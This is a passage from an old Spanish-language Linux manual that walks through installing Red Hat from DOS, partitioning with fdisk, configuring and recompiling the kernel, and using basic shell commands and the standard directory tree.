  617.   requiera creemos las nuevas particiones con "fdisk", al menos una particion
  618.   Nativa Linux y una particion de intercambio para Linux, la particion de
  619.   intercambio se utilizar para suministrar memoria virtual al sistema, y debe
  620.   tener un tamaño entre 16 y 128 megabytes, dependiendo de cuanto espacio de
  621.   disco tenga usted y cuantos programas grandes quiera ejecutar. Linux no
  622.   usar mas de 128 megabytes de intercambio, asi que no hay razon para hacer
  623.   su particion de intercambio mayor que eso. Se recomienda el uso de una
  624.   particion de intercambio sea cual fuere su RAM, y si su sistema tiene mas
  625.   de 16 megabytes de RAM lo recomendable para un uso promedio del sistema es
  626.   usar la mitad de RAM real como memoria de intercambio. La particion "Linux"
  627.   contendra todos sus ficheros, y puede hacerla de cualquier tamaño entre 40
  628.   megabytes y el tamaño maximo del disco, menos el tamaño de la particion de
  629.   intercambio. Si usted esta familiarizado con Unix o Linux, puede querer
  630.   crear particiones adicionales, por ejemplo, puede crear particiones que
  631.   contendran los sistemas de ficheros /var, y /usr.
  632.  
  633.         Si ya tenemos listo el Disco Rigido y la informacion necesaria
  634.   podemos proceder a la instalacion para ello necesitaremos que la PC
  635.   encendida con DOS y con acceso al CD-ROM con el CD de Red Hat colocado.
  636.  
  637.   1. Ingresar al directorio DOSUTILS
  638.  
  639.   2. Ejecutar DOSBOOT.BAT el que se encarga de llamar a "LOADLIN.EXE" que es
  640.      un programa DOS que carga una imagen del Kernel en RAM borrando todo
  641.      vestigio del DOS.
  642.  
  643.   3. Luego del Booteo, Linux entra automaticamente en una aplicacion que no
  644.      es otra cosa que un asistente para la instalacion. A el deberemos
  645.      contestar las preguntas que nos vaya haciendo de acuerdo a la
  646.      informacion que recopilamos.
  647.  
  648.   4. Tambien el asistente se encargara de preguntar acerca del nuestro HD
  649.      dandonos la posibilidad de ejecutar "fdisk" a fin de particionar nuestro
  650.      rigido, el uso de fdisk es sencillo a pesar de ser mucho mas poderoso
  651.      que el de DOS y Windows basta decir que con "m" accedemos a la ayuda del
  652.      mismo, lo que hora debemos hacer es: a) crear la particion SWAP con por
  653.      lo menos la mitad de la RAM real, para ello usaremos la opcion "n" y
  654.      luego de decirle el numero de particion le indicaremos el tipo que deber
  655.      ser primaria, con "t" le cambiamos el tipo a "82" que es SWAP, b) crear
  656.      la particion Linux Nativa con "n" nuevamente que tambien deber ser
  657.      primaria el tipo no es necesario cambiarlo por cuanto por defecto crea
  658.      particiones Linux Nativa (tipo 83).
  659.  
  660.   5. Seleccionar los paquetes que instalaremos, esta es una lista muy
  661.      extensa, son imprescindibles los paquetes base, C, C++, X11, Network,
  662.      pero son necesarios casi todos si lo que pretendemos es un servidor de
  663.      RED, lo superfluo son lo juegos y algunas aplicaciones muy especificas
  664.      como el diseño de circuitos y microprocesadores. Es recomendable
  665.      instalar el Midnight Commander que es un clon de Norton Comander para
  666.      Linux el que se encuentra en el paquete de Shells y el "joe" que es un
  667.      editor de texto similar a WordStar y los IDE de Borland.
  668.  
  669.   6. Ahora el asistente nos ayudara a instalar "lilo" que es el sistema de
  670.      arranque dual de Linus el que nos permitir la posibilidad de arrancar
  671.      con mas de un S.O.
  672.  
  673.   7. Si todo salio bien ya hemos terminado con la instalacion Red Hat. Si no
  674.      es asi aqui comienza nuestro penar y lo que les puedo recomendar es
  675.      armarse de paciencia y resarle a nuestro santo favorito que encontremos
  676.      las solucion.
  677.  
  678.         #Capitulo III
  679.  
  680.         KERNEL
  681.  
  682.         ¿Que es el Kernel?
  683.  
  684.         El kernel de UNIX actua como intermediario entre los programas, el
  685.   ordenador y el usuario. En primer lugar, gestiona la memoria de todos los
  686.   programas o procesos, y asegura que se asignen ciclos del microprocesador a
  687.   cada uno. Ademas, proporciona una interfaz portable para que los programas
  688.   hablen facilmente con su hardware.
  689.  
  690.         ¿Para que recompilar el kernel?
  691.  
  692.         Las nuevas versiones normalmente ofrecen la posibilidad de entenderse
  693.   con mas accesorios hardware (o sea, incluyen mas drivers), se ejecutan mas
  694.   rapidamente, son mas estables o corrigen errores de otras versiones. Ademas
  695.   la recompilacion nos permitir adecuar el nucleo a el hardware que tenemos
  696.   pudiendo de esta manera acceder por ejemplo a placas de sonido, video, etc.
  697.   Otra de las ventajas es que podemos seleccionar que sistemas de archivos
  698.   vamos a necesitar por ejemplo en mi caso unicamente accedo a sistemas Vfat
  699.   de W95, MS-DOS, ISO9660, Minix  y Ext2fs, de manera que no ocupo
  700.   innecesariamente recursos al incluir sistemas de archivos por ejemplo para
  701.   OS/2 o Coherent.
  702.  
  703.         ¿Que necesito para recompilar el Kernel?
  704.  
  705.   Necesitaremos: 
  706.  
  707.   1. Las fuentes del Kernel que se proveen con cualquier distribucion de
  708.      Linux, tambien los podemos actualizar de Internet para poder contar con
  709.      la ultima version. Aproximadamente los fuentes comprimidos con gzip
  710.      ocupan 8MB y una vez descomprimido en el disco usan cerca de 30MB.
  711.  
  712.   2. El compilador de C "gcc" incluido en el paquete de "Development"
  713.  
  714.   3. Las librerias "libc".
  715.  
  716.   Archivos y directorios.
  717.  
  718.         Entre en la cuenta root y vaya al directorio /usr/src. Si instalo las
  719.   fuentes en la instalacion de Linux, habra aqui un directorio linux, con las
  720.   fuentes antiguas. Si quiere preservar esas fuentes (y tiene espacio de
  721.   sobra), renombre (con mv) ese directorio a linux-x.y.z. Es importante que
  722.   antes de descomprimir las nuevas fuentes no haya ningun directorio
  723.   /usr/src/linux.
  724.  
  725.         Ahora, en /usr/src, descomprima las fuentes con
  726.  
  727.   tar xvfzp linux-x.y.z.tar.gz
  728.  
  729.         (Si solo tiene un fichero .tar, sin .gz, elimine la z del comando
  730.   tar). Los contenidos del fichero se expandir n en /usr/src/linux. Vaya
  731.   ahora a ese directorio y lea el fichero README.
  732.  
  733.         Configuracion del Kernel
  734.  
  735.         Antes de recompilar debemos configurar que caracteristicas tendra
  736.   nuestro nuevo kernel para ello primero limpiaremos de anteriores
  737.   configuraciones el disco con:
  738.  
  739.   make mrproper
  740.  
  741.         luego comenzaremos con la configuracion en si con:
  742.  
  743.   make config
  744.  
  745.         invocado en el directorio /usr/src/linux inicia un programa shell-
  746.   script de configuracion que le preguntar bastantes cosas. Requiere que este
  747.   instalado bash, con lo que debe existir /bin/bash, /bin/sh o la variable
  748.   $BASH.
  749.  
  750.         Si los fuentes que posee son superiores al 2.0.x, existen dos metodos
  751.   bastante mas agradables e interactivos de llevar a cabo la configuracion;
  752.   invocando desde modo texto, en el mismo directorio mencionado anteriormente
  753.  
  754.   make menuconfig
  755.  
  756.         Iniciar un colorido programa muy agradable y bastante mas funcional
  757.   que el make config a secas, para llevar a cabo la configuracion del kernel.
  758.  
  759.         Observar que su uso es bastante intuitivo; las opciones con un < >
  760.   indican la posibilidad de modularizar; si en ella presionamos M la
  761.   seleccionaremos como modulo. Si presionamos ESPACIO aparecer un * indicando
  762.   que ser incluido en el kernel. Finalmente, si presionamos N lo
  763.   deseleccionaremos.
  764.  
  765.         Las opciones marcadas con [ ] no son modularizables.
  766.  
  767.         Si Vd. es un fan de las X, entonces puede arrancar desde un xterm el
  768.   script equivalente, ejecutando
  769.  
  770.   make xconfig
  771.  
  772.         Supongo (porque siempre lo ice con make menuconfig) que aparecer ante
  773.   sus ojos un maravilloso y grafico programa de seleccion y configuracion del
  774.   kernel bajo X Window .
  775.  
  776.         A continuacion describire las opciones que creo son mas importantes a
  777.   tener en cuenta al momento de compilar de todos modos las que aqui no este
  778.   comentadas y Ud. Desee conocer cualquiera de los metodos de configuracion
  779.   usados tendra un acceso a ayuda.
  780.  
  781.         Emulacion de coprocesador (kernel math emulation): Si no tiene
  782.   coprocesador matematico debe contestar `y' a esto.  Si tiene coprocesador y
  783.   contesta `y' la emulacion ser instalada pero no usada; funcionar , pero le
  784.   ocupar memoria innecesariamente. Ademas, he oido que la emulacion es lenta,
  785.   lo que se traducir en unas pesadas X-Window.
  786.  
  787.         Soporte de discos IDE y MFM/RLL: Normalmente necesitar este soporte,
  788.   pues es el de los discos habituales en los PCs. Este manejador no gestiona
  789.   discos SCSI, para eso esta la opcion especifica que luego veremos. Ahora se
  790.   le preguntar si quiere usar ``old disk-only'' y manejadores ``new IDE''.
  791.   Tiene que elegir uno de ellos. La diferencia principal es que el nuevo (new
  792.   IDE) maneja controladoras secundarias y CD-ROMs IDE/ATAPI, hasta cuatro
  793.   dispositivos, pero ocupa 4 KB mas que el antiguo. Se supone que los nuevos
  794.   manejadores mejoran tambien velocidad y fiabilidad, en especial si dispone
  795.   de dispositivos EIDE.
  796.  
  797.         Soporte de redes (networking support): En principio, contestaria
  798.   afirmativamente si la maquina estuviera en una red local o conectada a la
  799.   Internet con SLIP/PPP. Sin embargo, muchos programas, como ocurre con el
  800.   sistema XWindow, requieren el soporte de red, asi que lo mejor es contestar
  801.   `y' siempre. Despues se le preguntar si quiere soporte TCP/IP: conteste
  802.   afirmativamente aun no estando seguro.
  803.  
  804.         Limitar memoria a 16 Mb (Limit memory to low 16MB)
  805.  
  806.         Hay controladores de DMA en 386 con problemas para direccionar mas de
  807.   16 MB de RAM. Conteste `y' en el caso (raro) de que tenga uno de estos.
  808.  
  809.         Comunicacion entre procesos System V (System V IPC): Sinceramente no
  810.   se bien lo que es pero lei que no es recomendable desactivarlo.
  811.  
  812.         Tipo de procesador (Processor type): Deber elegir siempre la CPU que
  813.   tenga (aunque la versión de 386 funcionar en todas las maquinas).
  814.  
  815.         Soporte SCSI (SCSI support): Si tiene dispositivos SCSI, conteste
  816.   `y'. Se le preguntaran entonces mas cosas: soporte de CD-ROM, discos y que
  817.   clase de adaptador utiliza.
  818.  
  819.         Soportes de tarjetas de red (Network device support): Si tiene
  820.   tarjeta de red, o quiere usar PPP, SLIP o PLIP (puerto paralelo usado para
  821.   conectarse a Internet), conteste afirmativamente. El script le preguntara
  822.   ahora que tarjeta tiene y que protocolo usar.
  823.  
  824.         Sistemas de ficheros (Filesystems): El programa le preguntara si
  825.   quiere soporte para los siguientes sistemas de ficheros:
  826.  
  827.   * Standard (minix) - Las nuevas distribuciones no crean sistemas Minix, y
  828.     mucha gente no las usa para nada, pero puede convenir elegirla. Algunos
  829.     ``discos de rescate'' usan el sistema Minix como formato de sus disquetes,
  830.     ya que da menos problemas.
  831.  
  832.   * Extended fs - Fue la primera version del sistema extendido, pero ya no se
  833.     usa. No necesita seleccionarla.
  834.  
  835.   * Second extended - Este es el sistema mas usado. Seguramente lo usara Vd.
  836.     tambien. Seleccione `y'. (Ojo con seleccionarlo como modulo; aunque se
  837.     puede, el sistema de ficheros en el que este su partición "/" debe estar
  838.     incluido el kernel no-modularmente, ya que de lo contrario no podra
  839.     arrancar.)
  840.  
  841.   * xiafs filesystem - Hace mucho pudo ser usado, pero ahora mismo no.
  842.  
  843.   * msdos - Seleccionelo si quiere acceder desde Linux a sus particiones de
  844.     MS-DOS o quiere montar disquetes de ese sistema.
  845.  
  846.   * umsdos - Este sistema permite añadir a un sistema MS-DOS las
  847.     caracteristicas tipicas de Unix como nombres largos o enlaces. Sirve para
  848.     quienes quieran instalar Linux en la particion DOS, pero nada mas.
  849.  
  850.   * /proc - (una idea robada descaradamente a Bell Labs, si no me equivoco)
  851.     No se trata de algo que se guarde en el disco, sino de una interfaz por
  852.     medio de ficheros con la tabla de procesos del nucleo, usada por
  853.     programas como `ps'. Pruebe a teclear `cat /proc/meminfo' o
  854.     `cat /proc/devices'. Algunos shells (rc, concretamente) hacen uso de
  855.     /proc/self/fd (en lugar de /dev/fd) para E/S. Debe contestar
  856.     afirmativamente a la pregunta: muchas utilidades de Linux lo necesitan.
  857.  
  858.   * NFS - Si su maquina esta en red y quiere acceder a sistemas de ficheros
  859.     remotos con NFS, conteste `y' a esta pregunta.
  860.  
  861.   * ISO9660 - Tipico en los CD-ROMs. Si tiene un CD-ROM, seleccione esta
  862.     opcion.
  863.  
  864.   * OS/2 HPFS - Para acceder a disco de OS/2. En el momento de escribir esto,
  865.     el soporte HPFS es de solo lectura.
  866.  
  867.   * System V and Coherent - para particiones de sistemas Coherent y System V
  868.     (otras variantes de Unix para PC). Conteste "no".
  869.  
  870.   * quota support - Seleccionelo si quiere administrar el espacio que
  871.     consumen en disco los usuarios del sistema.
  872.  
  873.   * vfat - En conjuncion con el sistema de fichero fat o msdos nos permitira
  874.     acceso a las particiones de w95, con soporte de nombres ``largos'' y
  875.     demas. En el momento de escribir esto, se desconoce si soportar  la
  876.     ``nueva'' fat32 del w95-OSR2.
  877.  
  878.   * SMB filesystem support - En conjuncion con el paquete samba nos permitir
  879.     montar volumenes compartidos por clientes de red NetBios.
  880.  
  881.   * SMB w95 bug workaround - Corrije un bug que experimentan los volumenes
  882.     exportados por servidores w95.
  883.  
  884.   * Amiga FFS support - Soporte para el sistema de ficheros Fast File System
  885.     de Amiga.
  886.  
  887.   * UFS filesystem support - Soporte para el Unix FileSystem, empleado por
  888.     algunos Unix BSD, como SunOS, FreeBSD, NetBSD, NeXTstep. Permite montar
  889.     dichas particiones o disquetes en modo de solo lectura.
  890.  
  891.   * NCP filesystem support - Permite montar volumenes NetWare. Necesitar
  892.     programas cliente para llevarlo a cabo.
  893.  
  894.         Pero. ¿que sistemas de ficheros necesito! Teclee `mount'. La salida
  895.   ser como esta:
  896.  
  897.   blah# mount
  898.   /dev/hda1 on / type ext2 (defaults)
  899.   /dev/hda3 on /usr type ext2 (defaults)
  900.   none on /proc type proc (defaults)
  901.   /dev/fd0 on /mnt type msdos (defaults)
  902.  
  903.         Observe cada linea; la palabra que sigue a `type' es el tipo de
  904.   sistema usado. En este ejemplo, los sistemas raiz (/) y /usr usan el
  905.   sistema ``second extended'', ademas usamos sistema ``proc'' y hay montado
  906.   un disquete MS-DOS.
  907.  
  908.         Para saber que sistemas de ficheros usa en el nucleo actual puede
  909.   teclear `cat /proc/filesystems' siempre y cuando tenga al menos soporte
  910.   proc.
  911.  
  912.         Manejadores de tipo caracter (Character devices): Aqui se activan los
  913.   manejadores para impresoras (por puerto paralelo), ratones de bus, ratones
  914.   PS/2 (usado tambien en muchos trackballs de los portatiles), algunos
  915.   manejadores de cintas y otros.  Conteste segun su hardware.
  916.  
  917.         Placa de sonido (Sound card): Si tiene placa de sonido conteste `y' y
  918.   despues otro programa de configuracion le preguntara acerca de la tarjeta
  919.   de sonido que tiene. Aqui es importante saber el puerto E/S, la IRQ, DMA de
  920.   nuestra placa de Sonido.
  921.  
  922.         Otras opciones de configuracion: No todas las opciones se han listado
  923.   ya que cambian mucho y otras son completamente evidentes (por ejemplo, el
  924.   soporte 3Com 3C509).
  925.  
  926.         Kernel hacking: Traduccion del fichero README de Linus: La
  927.   configuración ``kernel hacking'' suele dar lugar a un nucleo mas grande y/o
  928.   lento, y puede hacerlo menos estable al configurar algunas rutinas
  929.   especiales para encontrar errores del nucleo. Deber  contestar `n' a la
  930.   pregunta.
  931.  
  932.         El archivo Makefile
  933.  
  934.         Tras hacer make config, un mensaje le dira que ya esta preparado el
  935.   kernel y que "revise el fichero Makefile para opciones adicionales".
  936.  
  937.         Por tanto, veamos el Makefile. Probablemente no tendra que cambiar
  938.   nada, pero debe mirarse. Sus opciones podran cambiarse con el comando
  939.   "rdev" una vez que el kernel este compilado.
  940.  
  941.         Compilacion del Kernel
  942.  
  943.         Limpieza y dependencias
  944.  
  945.         Cuando se termina de configurar debe ejecutar "make dep" y "make
  946.   clean. Haga `make dep', lo que preparar  las dependencias en poco tiempo, a
  947.   menos que su PC sea muy lento. Cuando acabe, haga "make  clean". Esto
  948.   elimina ficheros objetos y demas de la version anterior. No olvidar este
  949.   paso.
  950.  
  951.         La compilacion
  952.  
  953.         Despues de preparar dependencias, puede ejecutar "make zImage"(esta
  954.   es la parte que tarda mas tiempo). `make zImage' compilar el nucleo y lo
  955.   dejar comprimido en el subdirectorio arch/i386/boot/zImage junto a otros
  956.   ficheros. La "z" inicial indica que el lo que obtenemos es una imagen
  957.   comprimida del kernel, se descomprime automaticamente al ser ejecutado.
  958.  
  959.         Compilacion de Modulos
  960.  
  961.         Las ordenes make modules; make modules_install compilaran los modulos
  962.   que hayamos seleccionado, y los instalaran. No olvidar ejecutar depmod -a
  963.   en cuanto hayamos arrancado con dicho nucleo.
  964.  
  965.         Instalacion del Kernel nuevo
  966.  
  967.         La instalacion se hara en el directorio "/boot" si lo que instalamos
  968.   es RedHat, en otro caso se la hace en "/". Veamos ahora como hacer esto:
  969.  
  970.   cd arch/i386/boot
  971.   chmod 400 zImage
  972.   rdev -R zImage 1
  973.   cp zImage /boot/nuevokernel
  974.  
  975.         Solo nos resta retocar el archivo lilo.conf que se encuentra en el
  976.   directorio /etc.
  977.  
  978.         #CAPITULO IV
  979.  
  980.         USO
  981.  
  982.         Conceptos basicos preliminares
  983.  
  984.         Para entender mejor Linux muchas veces haremos comparaciones con DOS,
  985.   asi que aqui van algunas consideraciones acerca de MS-DOS o Linux. Muchos
  986.   usuarios de Linux confian en MS-DOS para aplicaciones tales como
  987.   procesadores de texto. Aunque Linux proporciona sus propios an logos para
  988.   estas aplicaciones (por ejemplo, TEX), existen varias razones por las que
  989.   un usuario concreto desearia correr tanto MS-DOS como Linux. Hay muchas
  990.   aplicaciones comerciales para MS-DOS que no estan disponibles tidavia para
  991.   Linux, y no hay ninguna razon por la que no pueda usar ambos.
  992.  
  993.         Como puede saber, MS-DOS no utiliza completamente la funcionalidad de
  994.   los procesadores 80386 y 80486. Por otro lado, Linux corre completamente en
  995.   el modo protegido del procesador y explota todas las caracteristicas del
  996.   este. Puede acceder directamente a toda su memoria disponible (e incluso
  997.   mas haya de la disponible, usando RAM virtual). Linux proporciona un
  998.   interface UNIX completo no disponible bajo MS-DOS el desarrollo y
  999.   adaptacion de aplicaciones UNIX bajo Linux es cosa facil, mientras que,
  1000.   bajo MS-DOS, Ud. esta limitado a un pequeño subgrupo de la funcionalidad de
  1001.   programacion UNIX. Al ser Linux un verdadero sistema UNIX, Ud. no tendria
  1002.   estas limitaciones.
  1003.  
  1004.         Podriamos debatir los pros y contras de MS-DOS y Linux durante
  1005.   paginas y paginas. Sin embargo, baste decir que Linux y MS-DOS son
  1006.   entidades completamente diferentes. MS-DOS no es caro (comparado con otros
  1007.   sistemas operativos comerciales), y tiene un fuerte asentamiento en el
  1008.   mundo de los PC's. Ningun otro sistema operativo para PC ha conseguido el
  1009.   nivel de popularidad de MS-DOS, basicamente porque el coste de esos otros 
  1010.   sistemas operativos es inaccesible para la mayoria de los usuarios de PCs.
  1011.   Muy pocos usuarios de PC pueden imaginar pagar lo que cuesta por ejemplo un
  1012.   Solaris. Linux, sin embargo, es gratis.
  1013.  
  1014.         Podra emitir sus propios juicios de Linux y MS-DOS basados en sus
  1015.   expectativas y necesidades. Linux no esta destinado a todo el mundo.
  1016.  
  1017.         Este capitulo no presentara gran cantidad de detalles ni cubriria
  1018.   temas muy avanzados. Sino que esta pensado para permitir al nuevo usuario
  1019.   de Linux comenzar a usar el sistema y situarlo en una posicion en la que
  1020.   pueda leer libros mas generales sobre UNIX y entender las diferencias
  1021.   basicas entre otros sistemas UNIX y Linux.
  1022.  
  1023.         A primera vista, UNIX parece como MS-DOS (despues de todo, partes de
  1024.   MS-DOS fueron tomadas de CP/M, el cual fue a su vez inspirado en UNIX
  1025.   incluso muchas de las novedades que Windows 95 pretende presentar son
  1026.   caracteristicas de los sistemas UNIX). Pero, solo las caracteristicas
  1027.   superficiales de UNIX se parecen a MS-DOS.
  1028.  
  1029.         Como ya dijimos, Linux es un sistema operativo multitarea y
  1030.   multiusuario. Bajo UNIX, para que los usuarios puedan identificarse en el
  1031.   sistema, deben registrarse (login), proceso que consta de dos pasos:
  1032.   Introducir el nombre de usuario (login) (el nombre con que ser
  1033.   identificado por el sistema), y una palabra clave o contraseña (password),
  1034.   la cual es su llave personal secreta para entrar en la cuenta. Como solo
  1035.   usted conoce su palabra clave, nadie mas podra logearse en el sistema con
  1036.   su nombre de usuario. Por esto es muy importante tomarse unos minutos para
  1037.   elegir una palabra clave que no sea facil de adivinar o desencriptar, es
  1038.   comun en los novatos usar palabras claves que tiene algo que ver con ellos,
  1039.   por ejemplo el nombre de la esposa, madre, hija, fecha de nacimiento,
  1040.   numero de documento, hasta el nombre de su mascota, de esta manera los
  1041.   hacker usan diccionarios con (por ejemplo) nombres comunes de mascotas para
  1042.   lograr adivinar claves de usuarios desprevenidos.
  1043.  
  1044.         En los sistemas UNIX tradicionales, el administrador del sistema
  1045.   asignara el nombre de usuario y una palabra clave inicial en el momento de
  1046.   crear la cuenta de usuario.
  1047.  
  1048.         Ademas, cada sistema UNIX tiene un nombre del sistema (hostname. Este
  1049.   "hostname" le da nombre a la maquina, ademas de caracter y encanto, por
  1050.   ejemplo la mia se llama Tesla, la anterior fue Newton y la anterior
  1051.   Leonardo. El nombre del sistema es usado para identificar maquinas en una
  1052.   red, pero incluso aunque la maquina no este en red, deberia tener un nombre.
  1053.  
  1054.         Antes de poder usar el sistema, deber crear una cuenta de usuario.
  1055.   Esto es necesario porque no es buena idea usar la cuenta de root para los
  1056.   usos normales. La cuenta de root deberia reservarse para el uso de comandos
  1057.   privilegiados y para el mantenimiento del sistema.
  1058.  
  1059.         Shells
  1060.  
  1061.         La forma de comunicarse entre el S.O., el hardware y el usuario es un
  1062.   Shell, en Linux, el mas difundido es "bash" que significa "Bourne again
  1063.   shell" aunque existen varios shells para todos los gustos. En la mayoria de
  1064.   las exploraciones en el mundo de UNIX, estar hablando con el sistema a
  1065.   traves del uso de un shell. Un shell es simplemente un programa que toma la
  1066.   entrada del usuario (ej. las ordenes que teclea) y las traduce a
  1067.   instrucciones. Esto puede ser comparado con el COMMAND.COM de MS-DOS o el
  1068.   4DOS para los mas exquisitos, los cuales  efectuan esencialmente la misma
  1069.   tarea. El shell es solo uno de los interfaces con UNIX hay muchos
  1070.   interfaces posibles como el sistema X Windows, el cual le permite ejecutar
  1071.   comandos usando el raton y el teclado.
  1072.  
  1073.         Antes de continuar, deberiamos ver como salir del sistema. Desde la
  1074.   linea de comandos usaremos la orden "exit" para salir. Hay otras formas,
  1075.   pero esta es la mas facil.
  1076.  
  1077.         Directorios
  1078.  
  1079.         La mayoria de los sistemas UNIX tienen una distribucion de ficheros
  1080.   estandar, de forma que recursos y ficheros puedan ser facilmente
  1081.   localizados. Esta distribucion forma el arbol de directorios, el cual
  1082.   comienza en el directorio "/", tambien conocido como "directorio raiz".
  1083.   Directamente por debajo de "/" hay algunos subdirectorios importantes:
  1084.   /bin, /etc, /dev y /usr, entre otros. Estos a su vez contienen otros
  1085.   directorios con ficheros de configuracion del sistema, programas, etc. En
  1086.   particular, cada usuario tiene un directorio "home". Este es el directorio
  1087.   en el que el usuario guardara sus archivos. Usualmente, los directorios
  1088.   home de los usuarios cuelgan de /home y son nombrados con el nombre del
  1089.   usuario al que pertenecen.
  1090.  
  1091.   El siguiente es un ejemplo de arbol de directorios en linux.
  1092.  
  1093.   /________bin
  1094.         |
  1095.         |__dev
  1096.         |
  1097.         |__etc
  1098.         |
  1099.         |__home_______juan
  1100.         |          |
  1101.         |          |__pedro
  1102.         |__lib
  1103.         |  
  1104.         |__proc
  1105.         |
  1106.         |__tmp
  1107.         |          
  1108.         |__usr_______X386
  1109.                   |
  1110.                   |__bin
  1111.                   |
  1112.                   |__emacs
  1113.                   |
  1114.                   |__etc
  1115.                   |  
  1116.                   |__g++-include
  1117.                   |
  1118.                   |__include
  1119.                   |
  1120.                   |__lib
  1121.                   |
  1122.                   |__local_______bin
  1123.                   |           |  
  1124.                   |           |__emacs
  1125.                   |           |
  1126.                   |           |__etc
  1127.                   |           |
  1128.                   |           |__lib
  1129.                   |
  1130.                   |__man
  1131.                   |  
  1132.                   |__spool
  1133.                   |
  1134.                   |__src_______linux
  1135.                   |
  1136.                   |__tmp
  1137.                  
  1138.         Comandos Basicos
  1139.  
  1140.         Antes de comenzar es importante destacar que todos los nombres de
  1141.   ficheros y comandos son "case-sensitive" (que hacen diferencia entre
  1142.   mayusculas y minusculas, a diferencia de sistemas operativos como MS-DOS).
  1143.   Por ejemplo, el comando make es diferente a Make o MAKE. Lo mismo ocurre en
  1144.   el caso de nombres de ficheros o directorios.
  1145.  
  1146.         Cambio de directorio:
  1147.  
  1148.         La orden para movernos por la estructura de directorios es cd,
  1149.   abreviacion de "cambio de directorio". Hay que destacar, que la mayoria de
  1150.   las ordenes UNIX mas usadas son de dos o tres letras.
  1151.  
  1152.         La forma de uso de la orden cd es:
  1153.  
  1154.   cd <directorio>
  1155.  
  1156.         donde <directorio> es el nombre del directorio al que queremos ir. Si
  1157.   usamos cd sin par metros esto no llevara a nuestro directorio. Tenemos
  1158.   tambien dos puntero uno al directorio padre ".." y otro a si mismo "." Esto
  1159.   tambien fue copiado por DOS.
  1160.  
  1161.         Consultar el directorio actual
  1162.  
  1163.         Para saber en que directorio no escontramos usaremos el comando "pwd"
  1164.  
  1165.         Consultar el contenido de los directorios
  1166.  
  1167.         Una vez que podemos navegar por nuestro arbol de directorio lo mas
  1168.   importantes es poder ver que tenemos en cada uno. Para eso usaremos el
  1169.   comando "ls", ls vendria a ser "dir" del DOS, pero como vernos mas adelante
  1170.   es mucho mas poderoso como todos los comandos de Linux. Ls tiene muchos
  1171.   parametros que van a afectar su comportamiento a todos pero el mas usado
  1172.   sin duda ser "-l" que no mostrara con mas detalle el contenido del
  1173.   directorio.
  1174.  
  1175.         Consultar las paginas del manual
  1176.  
  1177.         En este momento creo que uno de los comandos que mas nos van a ayudar
  1178.   en el aprendizaje de Linux es "man" que siguiendo con las comparaciones con
  1179.   el DOS vendria a ser el "help" con man podremos solicitar informacion de
  1180.   todos los comandos e incluso algunos programas y aplicaciones tiene sus
  1181.   propias paginas de manual. En mi experiencia personal man me ayudo mas
  1182.   veces que cualquier libro.
  1183.  
  1184.         La forma de usarlo es:
  1185.  
  1186.   man <comando>
  1187.  
  1188.         Creacion de directorios:
  1189.  
  1190.         Para esto usaremos el comando "mkdir" como en DOS seguido del nombre
  1191.   del directorio a crear.
  1192.     
  1193.   mkdir <nombre>
  1194.  
  1195.         Copiado de archivos
  1196.  
  1197.         La orden "cp" copia los ficheros listados en la linea de comandos al
  1198.   fichero o directorio pasado como ultimo argumento. Notese como se usa el
  1199.   directorio "." para referirnos al directorio actual.
  1200.  
  1201.   cp <origen> <destinod>
  1202.  
  1203.         Mover archivos
  1204.  
  1205.         Tanto para mover como para renombrar archivos o directorio usaremos
  1206.   el comando "mv" de identica manera a "cp" solo que en esta caso no se
  1207.   preservara el origen.
  1208.  
  1209.   mv <origen> <destinod>
  1210.  
  1211.         Borrado de archivos
  1212.         
  1213.         Para borrar se usa "rm" que viene de remove. Se usa con un parametro
  1214.   que es el nombre del fichero a borrar o una lista de ellos. Tambien lo
  1215.   podemos usar para borrar directorios completos con el parametro "-r" a hay
  1216.   que ser muy prudente y cuidadoso con este comando ya que podemos hacer
  1217.   macanas.
  1218.  
  1219.   rm <nombre de archivo o directorio>
  1220.  
  1221.         Mirando los ficheros
  1222.  
  1223.         Las ordenes "more", "cat" y "less" son usadas para ver el contenido
  1224.   de ficheros. More y less muestran el fichero pantalla a pantalla mientras
  1225.   que cat lo muestra entero de una vez.
  1226.  
  1227.   more <archivo>
  1228.   less <archivo>
  1229.   cat <archivo>
  1230.  
  1231.         El sistema de ficheros es la coleccion de ficheros y la jerarquia de
  1232.   directorios de su sistema.
  1233.  
  1234.         Primero cambie al directorio raiz (cd /) y ejecute ls -F.
  1235.   Probablemente vera estos directorios:
  1236.  
  1237.   bin, dev, etc, home, install, lib, mnt, proc, root, tmp, user, usr, y var.
  1238.  
  1239.         La distribucion de directorios y archivos es Unix es muy ordenada y
  1240.   distinta que en DOS, veamos para que usamos cada directorio.
  1241.  
  1242.   Directorio
  1243.   Contenido
  1244.  
  1245.   /bin
  1246.   /bin Es la abreviacion de "binaries", o ejecutables.  Es donde residen la
  1247.        mayoria de los programas esenciales del sistema.
  1248.  
  1249.   /dev
  1250.   /dev Los "ficheros" en /dev son conocidos como controladores de dispositivo
  1251.        (device drivers)_son usados para acceder a los dispositivos del
  1252.        sistema y recursos, como discos duros, modems, memoria, etc
  1253.  
  1254.   /etc
  1255.   /etc Contiene una serie de ficheros de configuracion del sistema. Estos
  1256.        incluyen /etc/passwd (la base de datos de usuarios), /etc/rc (guiones
  1257.        de inicializacion del sistema), etc.
  1258.  
  1259.   /sbin
  1260.   /sbin Se usa para almacenar programas esenciales del sistema, que usara el
  1261.         administrador del sistema.
  1262.  
  1263.   /home
  1264.   /home Contiene los directorios "home" de los usuarios. Por ejemplo,
  1265.         /home/juan es el directorio del usuario "juan".
  1266.  
  1267.   /lib
  1268.   /lib Contiene las imagines de las librerias compartidas. Estos ficheros
  1269.        contienen codigo que compartirian muchos programas.
  1270.  
  1271.   /proc
  1272.   /proc Es un "sistema de ficheros virtual". Los ficheros que contiene
  1273.         realmente residen en memoria, no en un disco. Hacen referencia a
  1274.         varios procesos que corren en el sistema, y le permiten obtener
  1275.         informacion acerca de que programas y procesos estan en ejecucion.
  1276.  
  1277.   /usr
  1278.   /usr Es un directorio muy importante. Contienen una serie de subdirectorios
  1279.        que contienen a su vez algunos de los mas importantes y utiles
  1280.        programas y ficheros de configuracion usados en el sistema.
  1281.  
  1282.   /usr/X386
  1283.   /usr/X386 Contiene todos los ejecutables de X Window, ficheros de
  1284.             configuracion y de soporte.
  1285.  
  1286.   /usr/bin
  1287.   /usr/bin Es el deposito real de programas del sistema UNIX. Contiene la
  1288.            mayoria de los programas que no se encuentran en otras partes como
  1289.            /bin.
  1290.  
  1291.   /usr/include
  1292.   /usr/include Contiene los ficheros de cabecera para el compilador de C.
  1293.                Estos ficheros (la mayoria de los cuales terminan en .h, de
  1294.                "header") declaran estructuras de datos, subrutinas y
